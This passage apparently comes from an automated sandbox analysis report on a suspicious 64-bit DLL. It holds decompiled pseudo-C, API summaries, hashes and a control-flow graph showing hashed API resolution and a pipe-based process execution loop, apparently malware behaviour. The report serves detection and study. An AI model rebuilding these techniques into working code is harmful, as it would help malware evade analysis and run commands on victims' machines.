                  				_t596 = __rax + __r11 - 0x42c50dcb + r8d;
                  				_t620 = _a8;
                  				asm("rol ecx, 0xf");
                  				r8d =  !r8d;
                  				 *_t620 = _a24 + r8d;
                  				_t567 = __rax + _t619 + 0x2ad7d2bb + _t596;
                  				r8d = r8d | _t567;
                  				r8d = r8d ^ _t596;
                  				r8d = r8d + _v84;
                  				asm("ror eax, 0xb");
                  				 *((intOrPtr*)(_t620 + 4)) = _t617 + __rbx - 0x14792c6f +  *((intOrPtr*)(_t620 + 4)) + _t567;
                  				 *((intOrPtr*)(_t620 + 8)) =  *((intOrPtr*)(_t620 + 8)) + _t567;
                  				_t385 =  *((intOrPtr*)(_t620 + 0xc)) + _t596;
                  				 *((intOrPtr*)(_t620 + 0xc)) = _t385;
                  				return _t385;
                  			}






























                  0x180009c54
                  0x180009c59
                  0x180009c6f
                  0x180009c73
                  0x180009c7a
                  0x180009c81
                  0x180009c85
                  0x180009c89
                  0x180009c96
                  0x180009cb1
                  0x180009cb4
                  0x180009cb8
                  0x180009cbc
                  0x180009cbe
                  0x180009cc3
                  0x180009ce4
                  0x180009cf9
                  0x180009d01
                  0x180009d05
                  0x180009d1e
                  0x180009d26
                  0x180009d2a
                  0x180009d40
                  0x180009d48
                  0x180009d4c
                  0x180009d63
                  0x180009d6b
                  0x180009d6f
                  0x180009d8a
                  0x180009da4
                  0x180009dac
                  0x180009db0
                  0x180009dc3
                  0x180009dcb
                  0x180009dcf
                  0x180009dd8
                  0x180009de1
                  0x180009dfa
                  0x180009e02
                  0x180009e06
                  0x180009e21
                  0x180009e42
                  0x180009e58
                  0x180009e60
                  0x180009e64
                  0x180009e78
                  0x180009e80
                  0x180009e84
                  0x180009e9d
                  0x180009ea0
                  0x180009ea3
                  0x180009eab
                  0x180009eba
                  0x180009ec2
                  0x180009ec6
                  0x180009eda
                  0x180009ee3
                  0x180009eeb
                  0x180009eef
                  0x180009efb
                  0x180009f03
                  0x180009f08
                  0x180009f10
                  0x180009f14
                  0x180009f23
                  0x180009f2b
                  0x180009f2f
                  0x180009f4b
                  0x180009f61
                  0x180009f6e
                  0x180009f74
                  0x180009f81
                  0x180009f8d
                  0x180009f94
                  0x180009f9f
                  0x180009fac
                  0x180009fb3
                  0x180009fc0
                  0x180009fcd
                  0x180009fd1
                  0x180009feb
                  0x18000a007
                  0x18000a014
                  0x18000a01a
                  0x18000a024
                  0x18000a030
                  0x18000a037
                  0x18000a045
                  0x18000a052
                  0x18000a059
                  0x18000a077
                  0x18000a097
                  0x18000a0a6
                  0x18000a0b2
                  0x18000a0b8
                  0x18000a0c5
                  0x18000a0d1
                  0x18000a0d8
                  0x18000a0e4
                  0x18000a0ec
                  0x18000a0f0
                  0x18000a10c
                  0x18000a118
                  0x18000a120
                  0x18000a124
                  0x18000a136
                  0x18000a13e
                  0x18000a142
                  0x18000a14e
                  0x18000a159
                  0x18000a15d
                  0x18000a16a
                  0x18000a172
                  0x18000a176
                  0x18000a188
                  0x18000a19b
                  0x18000a1a3
                  0x18000a1a7
                  0x18000a1b5
                  0x18000a1c0
                  0x18000a1c4
                  0x18000a1d0
                  0x18000a1d8
                  0x18000a1dc
                  0x18000a1e5
                  0x18000a1ed
                  0x18000a1f1
                  0x18000a204
                  0x18000a20c
                  0x18000a210
                  0x18000a22a
                  0x18000a238
                  0x18000a240
                  0x18000a244
                  0x18000a254
                  0x18000a263
                  0x18000a26d
                  0x18000a271
                  0x18000a27e
                  0x18000a28a
                  0x18000a28e
                  0x18000a2a7
                  0x18000a2b5
                  0x18000a2c2
                  0x18000a2c6
                  0x18000a2dc
                  0x18000a2ea
                  0x18000a2f7
                  0x18000a2fb
                  0x18000a305
                  0x18000a311
                  0x18000a315
                  0x18000a32d
                  0x18000a33d
                  0x18000a34a
                  0x18000a34e
                  0x18000a366
                  0x18000a375
                  0x18000a382
                  0x18000a386
                  0x18000a390
                  0x18000a39c
                  0x18000a3a0
                  0x18000a3ad
                  0x18000a3ba
                  0x18000a3be
                  0x18000a3d6
                  0x18000a3e5
                  0x18000a3f2
                  0x18000a3f6
                  0x18000a40e
                  0x18000a411
                  0x18000a425
                  0x18000a437
                  0x18000a43a
                  0x18000a43d
                  0x18000a440
                  0x18000a442
                  0x18000a445
                  0x18000a448
                  0x18000a455
                  0x18000a45e
                  0x18000a470
                  0x18000a478
                  0x18000a47a
                  0x18000a48d

                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                  • Instruction ID: da65757d923d1ece893e98337654064ca0bb37cf04d21ba61795d8811ff59a21
                  • Opcode Fuzzy Hash: 1e22f3bce40282fe11e099c1db0b1c5fb4d2825a674946890b536f4ba39d9287
                  • Instruction Fuzzy Hash: 5912B4B7B784514BD71CCB19E892FA97792F394308B49912CEA17D3F44DA3DEA06CA40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 471 180008368-1800083a8 CreateEventA 472 180008598-18000859e GetLastError 471->472 473 1800083ae-1800083cc call 18000459c 471->473 474 1800085a0-1800085a8 472->474 479 1800083ce-1800083de 473->479 480 1800083e0 473->480 477 1800085aa CloseHandle 474->477 478 1800085b0-1800085b9 474->478 477->478 481 1800083e2-1800083e4 479->481 480->481 481->472 483 1800083ea-1800083ee ResumeThread 481->483 484 1800083f4-180008405 GetExitCodeProcess 483->484 484->472 485 18000840b-180008415 484->485 486 180008593-180008596 485->486 487 18000841b-18000843f PeekNamedPipe 485->487 486->472 486->474 487->472 488 180008445-18000844a 487->488 489 18000844c-18000846d ReadFile 488->489 490 18000848d-18000849e call 18000459c 488->490 489->472 492 180008473-180008487 call 180004258 489->492 495 1800084b3 490->495 496 1800084a0-1800084b1 490->496 492->472 492->490 498 1800084b5-1800084b7 495->498 496->498 498->472 500 1800084bd-1800084c4 498->500 501 1800084c6-1800084e4 WriteFile 500->501 502 1800084ee-18000850a WaitForMultipleObjects 500->502 501->472 503 1800084ea 501->503 502->474 504 180008510-180008513 502->504 503->502 505 180008519-18000852a call 18000459c 504->505 506 1800085ba-1800085bf 504->506 510 180008544 505->510 511 18000852c-180008542 505->511 506->486 508 1800085c1 506->508 508->484 512 180008546-18000854c 510->512 511->512 514 180008581 512->514 515 18000854e-18000856f WriteFile 512->515 518 180008583-180008585 514->518 519 1800085c6-1800085cb 514->519 516 180008571-18000857c ResetEvent 515->516 517 18000858b-180008591 GetLastError 515->517 516->484 517->486 518->484 518->517 519->474
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorFileLast$EventWrite$CloseCodeCreateExitHandleMultipleNamedObjectsPeekPipeProcessReadResetResumeThreadWait
                  • String ID: .RK
                  • API String ID: 1606758550-3354657194
                  • Opcode ID: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction ID: c67b93fc325dec5a333161014b43f1cf91cc3d00d80d1a92eadb22293fcdf481
                  • Opcode Fuzzy Hash: e535ec2e64825705009bac7a413637230dfc8d2d18d7f6c6a3e224415b496589
                  • Instruction Fuzzy Hash: 6C614032314A49D2EB92CB25E9947DA73E0FB8C7C5F408121FB8987A94DF38D658DB10
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: Heap$Free$Alloc$CriticalSectionlstrlen$EnterEscapeLeavelstrcpymemcpy
                  • String ID:
                  • API String ID: 1109037607-0
                  • Opcode ID: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction ID: acf6d717728defc35103db72fb922d6f00203a7e454cd640fbdac6a35d594990
                  • Opcode Fuzzy Hash: d44f845e7b71ac1e4097b2ef269f920d9d6927053d5c93f366d8a1b5ec574062
                  • Instruction Fuzzy Hash: F0519A35304B8986EB96CB67A8447DA73A5FB8DFC4F44C025EE4A83754EE39C609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseHandle$CriticalSection$Sleep$DeleteEnterEventFreeHeapLeaveObjectSingleWait
                  • String ID:
                  • API String ID: 2177250193-0
                  • Opcode ID: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction ID: f3fed24fe94b1aa8e153d29e7a34276cc5438fe7d956490b47d4b11a712edef8
                  • Opcode Fuzzy Hash: 077b512303bddf46be07a072b110e746afb00398c40a4b8bf0a8799af97e695f
                  • Instruction Fuzzy Hash: EA31F536701A4986EB96DF62E8503AD3360FB98FD4F44C021EA5E936A5DF38CA4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ExceptionRaise$ErrorLastLibraryLoad
                  • String ID: H
                  • API String ID: 948315288-2852464175
                  • Opcode ID: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction ID: 40cf2675a00ff9b37053f4863b037564f167e8a7fa8b642abd638291e1f5e275
                  • Opcode Fuzzy Hash: 35d5fb0c792fb9595ca7fe69b0557c78035173cf4c2b5f0dd7936f8c3fb862ce
                  • Instruction Fuzzy Hash: 7F914C32209B4996EBA6CF15E4447A9B3A1F74DBC4F09C129EA8D47754EF3CDA4AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E0000000118000431C(void* __edx, signed long long __rax, long long __rbx, intOrPtr* __rcx, long long __rbp, signed short _a8, intOrPtr _a16, long long _a24, long long _a32) {
                  				void* _v40;
                  				void* _v56;
                  				void* _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				long _t75;
                  				signed long long _t121;
                  				signed long long _t122;
                  				intOrPtr* _t124;
                  				void* _t151;
                  				void* _t158;
                  				void* _t172;
                  
                  				_t162 = __rbp;
                  				_t121 = __rax;
                  				_a24 = __rbx;
                  				_a32 = __rbp;
                  				_t161 =  *0x8000d4a0;
                  				_t124 = __rcx;
                  				r14d = 0;
                  				WaitForSingleObject(??, ??);
                  				if ( *((intOrPtr*)(__rcx + 0x50)) == r14d) goto 0x8000449d;
                  				E0000000118000459C(0xb74c62f4, __rax,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x80004372;
                  				 *_t121();
                  				_t151 = __rcx + 0x4c;
                  				r8d = 0x10;
                  				memcpy(??, ??, ??);
                  				E0000000118000459C(0x176fdd38, _t121,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t121 == _t172) goto 0x800043a9;
                  				_t10 = _t151 + 1; // 0x2
                  				_t11 = _t151 + 5; // 0x6
                  				r8d = _t11;
                  				 *_t121();
                  				goto 0x800043ad;
                  				_t122 = _t121 | 0xffffffff;
                  				 *(__rcx + 0x10) = _t122;
                  				if (_t122 == 0xffffffff) goto 0x8000444d;
                  				E0000000118000459C(0x66454c9c, _t122,  *((intOrPtr*)( *0x8000d4a0 + 0x30)));
                  				if (_t122 == _t172) goto 0x800043e0;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800043e3;
                  				if (r14d != r14d) goto 0x80004435;
                  				r8d = 1;
                  				_a8 = r14w;
                  				if (E00000001180008150(_t10, 0x66454c9c, __rcx,  *(__rcx + 0x10),  *__rcx, _t158,  *0x8000d4a0, __rbp,  &_a8) != r14d) goto 0x80004442;
                  				SetEvent(??);
                  				r9d = _a8 & 0x0000ffff;
                  				if (E000000011800091F8(_t10, _t124, _t124,  *((intOrPtr*)(_t124 + 0x10)), _t161, _t162,  &_a8) != r14d) goto 0x80004442;
                  				goto 0x8000447e;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				E00000001180008308(_t122, _t124, _t124 + 0x10);
                  				goto 0x80004455;
                  				if (GetLastError() == r14d) goto 0x80004481;
                  				if (r14d + 1 !=  *((intOrPtr*)(_t124 + 0x44))) goto 0x80004481;
                  				ResetEvent(??);
                  				WaitForSingleObject(??, ??);
                  				if (WaitForSingleObject(??, ??) == 0x102) goto 0x80004386;
                  				goto 0x80004570;
                  				E0000000118000459C(0x544646d0, _t122,  *((intOrPtr*)(_t124 + 0x20)));
                  				if (_t122 == _t172) goto 0x800044be;
                  				r8d = 0x10;
                  				 *_t122();
                  				goto 0x800044c1;
                  				if (r14d != r14d) goto 0x80004568;
                  				_a16 = 0x10;
                  				E0000000118000459C(0xd0aed27e, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x800044f2;
                  				 *_t122();
                  				goto 0x800044f5;
                  				if (r14d != r14d) goto 0x80004568;
                  				SetEvent(??);
                  				E0000000118000459C(0xa1aa58b7, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x8000452c;
                  				 *_t122();
                  				goto 0x80004530;
                  				if ((_t122 | 0xffffffff) == 0xffffffff) goto 0x80004568;
                  				r9d = 0;
                  				if (E000000011800091F8(_t10, _t124, _t124, _t122 | 0xffffffff, _t161, _t162,  &_a8) == r14d) goto 0x80004504;
                  				E0000000118000459C(0xb74c62f4, _t122,  *((intOrPtr*)(_t161 + 0x30)));
                  				if (_t122 == _t172) goto 0x80004504;
                  				 *_t122();
                  				goto 0x80004504;
                  				_t75 = GetLastError();
                  				ReleaseMutex(??);
                  				asm("lock add dword [esi+0x38], 0xffffffff");
                  				return _t75;
                  			}















                  0x18000431c
                  0x18000431c
                  0x18000431c
                  0x180004321
                  0x180004332
                  0x180004339
                  0x180004340
                  0x180004349
                  0x180004357
                  0x180004362
                  0x18000436a
                  0x180004370
                  0x180004372
                  0x18000437b
                  0x180004381
                  0x18000438f
                  0x180004397
                  0x18000439e
                  0x1800043a1
                  0x1800043a1
                  0x1800043a5
                  0x1800043a7
                  0x1800043a9
                  0x1800043ad
                  0x1800043b5
                  0x1800043c4
                  0x1800043cc
                  0x1800043d6
                  0x1800043dc
                  0x1800043de
                  0x1800043e6
                  0x1800043f4
                  0x1800043fa
                  0x18000440a
                  0x180004410
                  0x180004416
                  0x180004431
                  0x180004433
                  0x180004440
                  0x180004446
                  0x18000444b
                  0x180004458
                  0x18000445f
                  0x180004465
                  0x180004478
                  0x180004492
                  0x180004498
                  0x1800044a2
                  0x1800044aa
                  0x1800044b4
                  0x1800044ba
                  0x1800044bc
                  0x1800044c4
                  0x1800044d3
                  0x1800044db
                  0x1800044e3
                  0x1800044ee
                  0x1800044f0
                  0x1800044f8
                  0x1800044fe
                  0x18000450d
                  0x180004515
                  0x180004525
                  0x18000452a
                  0x180004534
                  0x18000453b
                  0x18000454c
                  0x180004557
                  0x18000455f
                  0x180004564
                  0x180004566
                  0x180004568
                  0x180004574
                  0x18000457a
                  0x180004599

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: ErrorEventLastObjectSingleWait$MutexReleaseResetmemcpy
                  • String ID:
                  • API String ID: 1434584367-0
                  • Opcode ID: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction ID: da870e4c5b3f8ba762a5b16c43bcb008f7342bdb94fea84615746d30c68c72b5
                  • Opcode Fuzzy Hash: 05eca3f02c4307a6bece942e39cfd0a26e8b6ec2b72e247ee98873b9e6061124
                  • Instruction Fuzzy Hash: 817173B2210A0882EBA2DF65D4503ED3361F78CBE4F148612EE6A5B7D5CE34CA898705
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: _snprintf$Heap$AllocTimememcpy$FileFreeSystemlstrlen
                  • String ID:
                  • API String ID: 1448584724-0
                  • Opcode ID: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction ID: 43bd3c41a0e216f1fe2d256970a36843f92bdaad392a56b89b43ab90d53a1bd0
                  • Opcode Fuzzy Hash: 1873a16970b6eb1eb8123085a0dd6b0133f1a5a141746e4d2519f222aa328f56
                  • Instruction Fuzzy Hash: 5851AB36B14A4886EB92CF16E8047DA77A5F78CBC4F558121EE0D83755EF38DA1AC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CloseHandleHeapProcess$AllocCreateErrorFreeLastMultipleObjectsTerminateWaitmemset
                  • String ID: h
                  • API String ID: 3316326719-2439710439
                  • Opcode ID: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction ID: 097b2738b8004f5ee40f8b7a1758c839ecbf0a38091e65ea8e5fbb9dadc2f9be
                  • Opcode Fuzzy Hash: fb432cae3a15b5eaa338603b7acd1f3494cf9eca908a212787e2a653c3defb75
                  • Instruction Fuzzy Hash: CF318E32704B8986EB95CB56E84479AB3A1F78CBD0F14C135EA9D83B64DF78C548CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E0000000118000970C(void* __ebx, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9, signed long long __r11) {
                  				void* __rdi;
                  				signed int _t56;
                  				int _t61;
                  				intOrPtr _t77;
                  				intOrPtr _t78;
                  				struct _CRITICAL_SECTION* _t121;
                  				long long _t124;
                  				intOrPtr* _t150;
                  				struct _CRITICAL_SECTION* _t154;
                  				long long _t161;
                  				intOrPtr* _t162;
                  				void* _t165;
                  				void* _t166;
                  				void* _t168;
                  				signed long long _t177;
                  				struct _CRITICAL_SECTION* _t179;
                  				struct _CRITICAL_SECTION* _t183;
                  				void* _t186;
                  				void* _t189;
                  				void* _t190;
                  
                  				_t177 = __r11;
                  				_t168 = __r8;
                  				_t126 = __rbx;
                  				 *((long long*)(_t165 + 0x10)) = __rbx;
                  				 *((long long*)(_t165 + 0x18)) = _t161;
                  				 *((long long*)(_t165 + 0x20)) = __rsi;
                  				_t166 = _t165 - 0x60;
                  				_t159 =  *__rcx;
                  				r14d = r8d;
                  				_t190 = __rdx;
                  				_t162 = __rcx;
                  				 *((long long*)(_t166 + 0x58)) =  *__rcx;
                  				if ( *((intOrPtr*)(__rcx + 0x70)) -  *((intOrPtr*)(__rcx + 0x50)) < 0) goto 0x80009758;
                  				E000000011800045E8(__ebx,  *0x8000d4a0, __rbx, __rcx,  *__rcx, __rcx, _t189, _t186);
                  				EnterCriticalSection(_t183);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(_t179);
                  				r11d =  *(_t162 + 0x70) & 0x000000ff;
                  				_t56 =  *(_t162 + 0x50) & 0x000000ff;
                  				if (r11d - _t56 >= 0) goto 0x800097e8;
                  				_t150 =  *((intOrPtr*)( *((intOrPtr*)(_t162 + 0x48)) + _t177 * 8));
                  				_t77 =  *_t150;
                  				if (_t77 == dil) goto 0x800097aa;
                  				if (_t77 == 0x2f) goto 0x800097a5;
                  				_t78 =  *((intOrPtr*)(_t150 + 1));
                  				if (_t78 != dil) goto 0x80009796;
                  				if (_t78 != dil) goto 0x800097ad;
                  				_t121 = _t154;
                  				if (_t121 == _t154) goto 0x800097c5;
                  				if ( *((char*)(_t121 - 1)) != 0x3a) goto 0x800097c5;
                  				if ( *((char*)(_t121 + 1)) != 0x2f) goto 0x800097c5;
                  				E00000001180001C00(0, _t126, _t177 + _t150, _t154, _t159, _t162);
                  				if (_t121 == _t154) goto 0x800097e8;
                  				 *(_t166 + 0x90) = 0 | _t56 + 0x00000002 == 0x00000008;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				if (_t121 == _t154) goto 0x8000996c;
                  				r9d = 0;
                  				r8d = r14d;
                  				 *((long long*)(_t166 + 0x38)) = _t166 + 0x40;
                  				 *((long long*)(_t166 + 0x30)) = _t166 + 0x48;
                  				_t24 = _t166 + 0x50; // 0x32
                  				_t124 = _t24;
                  				 *((long long*)(_t166 + 0x28)) = _t124;
                  				 *((intOrPtr*)(_t166 + 0x20)) = 0;
                  				if (E00000001180006108(_t126, _t162, _t190, _t168) != 0) goto 0x8000995c;
                  				_t187 =  *_t162;
                  				EnterCriticalSection(_t154);
                  				asm("lock inc ecx");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t162 + 0x18)) == _t154) goto 0x8000986b;
                  				E00000001180001C00(0, _t126,  *((intOrPtr*)(_t162 + 0x18)), _t154, _t159, _t162);
                  				goto 0x80009873;
                  				asm("lock inc ecx");
                  				if ( *(_t166 + 0x90) == _t154) goto 0x8000993c;
                  				r14d = lstrlenA(??);
                  				_t61 = lstrlenA(??);
                  				_t32 = _t187 + 2; // 0x2
                  				r15d = _t61;
                  				E00000001180001C00(_t124 + _t32,  *(_t166 + 0x90), _t121, _t154, _t159, _t162);
                  				if (_t124 == _t154) goto 0x8000992e;
                  				_t33 = _t190 + 1; // 0x1
                  				r8d = _t33;
                  				 *((char*)( *_t162 + _t124)) = 0x2f;
                  				memcpy(??, ??, ??);
                  				dil =  *(_t166 + 0x90) != 0;
                  				 *((intOrPtr*)(_t166 + 0x38)) = 2;
                  				 *((long long*)(_t166 + 0x30)) =  *((intOrPtr*)(_t166 + 0xb8));
                  				 *((long long*)(_t166 + 0x28)) =  *((intOrPtr*)(_t166 + 0xb0));
                  				 *((intOrPtr*)(_t166 + 0x20)) =  *((intOrPtr*)(_t166 + 0x40));
                  				if (E000000011800088B4(_t56 + 2,  *(_t166 + 0x90),  *((intOrPtr*)(_t166 + 0x58)), _t124,  *((intOrPtr*)(_t166 + 0xb0)), _t159, _t124,  *((intOrPtr*)(_t166 + 0x50)),  *((intOrPtr*)(_t166 + 0x48))) != 0x10d2) goto 0x80009920;
                  				asm("sbb eax, eax");
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80009971;
                  				return 8;
                  			}























                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x18000970c
                  0x180009711
                  0x180009716
                  0x180009724
                  0x18000972f
                  0x18000973b
                  0x18000973e
                  0x180009741
                  0x180009744
                  0x18000974f
                  0x180009753
                  0x18000975c
                  0x180009762
                  0x18000976b
                  0x180009771
                  0x180009776
                  0x18000977d
                  0x180009788
                  0x18000978f
                  0x180009794
                  0x180009799
                  0x18000979e
                  0x1800097a3
                  0x1800097a8
                  0x1800097aa
                  0x1800097b0
                  0x1800097b6
                  0x1800097bc
                  0x1800097cc
                  0x1800097d7
                  0x1800097e1
                  0x1800097e8
                  0x1800097f0
                  0x1800097fb
                  0x1800097fe
                  0x180009801
                  0x18000980e
                  0x180009813
                  0x180009813
                  0x18000981b
                  0x180009820
                  0x18000982d
                  0x180009833
                  0x180009840
                  0x180009846
                  0x180009850
                  0x18000985d
                  0x180009861
                  0x180009869
                  0x180009873
                  0x18000987c
                  0x18000988e
                  0x180009891
                  0x18000989a
                  0x18000989f
                  0x1800098a2
                  0x1800098ad
                  0x1800098af
                  0x1800098af
                  0x1800098bb
                  0x1800098c0
                  0x1800098e3
                  0x1800098ed
                  0x1800098f9
                  0x180009902
                  0x180009907
                  0x180009917
                  0x18000991c
                  0x180009928
                  0x180009936
                  0x180009946
                  0x180009956
                  0x180009964
                  0x18000996a
                  0x180009990

                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: CriticalFreeHeapSection$Leave$EnterTimelstrlen$FileSystemmemcpymemset
                  • String ID:
                  • API String ID: 4119546182-0
                  • Opcode ID: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction ID: 44ed652dd4a090d7685ee9479cd2374acead57c43adb5283d017da8f701a6da5
                  • Opcode Fuzzy Hash: 2ad9a0bc2d8bc88a4eb816e4b8ea3e44bf3c6b6e7dae9fa03fc2860de6b20740
                  • Instruction Fuzzy Hash: F5719436608A8886EBA1CF66E8043DAB7A1F78CBD0F458125FE9D83755DF38C649C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.587252026.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000000.00000002.587245538.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587266295.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000000.00000002.587272585.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                  Similarity
                  • API ID: AllocCreateErrorHeapLastPipememset
                  • String ID: .RK
                  • API String ID: 2695650488-3354657194
